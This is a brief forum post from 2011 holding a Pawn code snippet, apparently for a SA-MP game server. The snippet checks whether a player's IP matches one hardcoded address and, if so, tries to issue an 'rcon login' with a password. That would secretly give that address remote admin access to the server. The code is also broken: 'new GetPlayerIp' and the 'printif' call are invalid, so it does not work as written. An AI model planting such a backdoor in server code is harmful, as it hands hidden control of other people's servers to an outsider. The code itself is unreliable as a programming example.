26.06.2011, 12:15
Код:
#define IsRock "92.82.101.252" IfItsRock( playerid ) { new Rock_Ip[ 20 ]; new GetPlayerIp( playerid, Rock_Ip, sizeof( Rock_Ip ) ); if( !strcmp( Rock_Ip, IsRock, true ) ) { printif("OnPlayerCommandText", "s", "rcon login password"); } return 1; }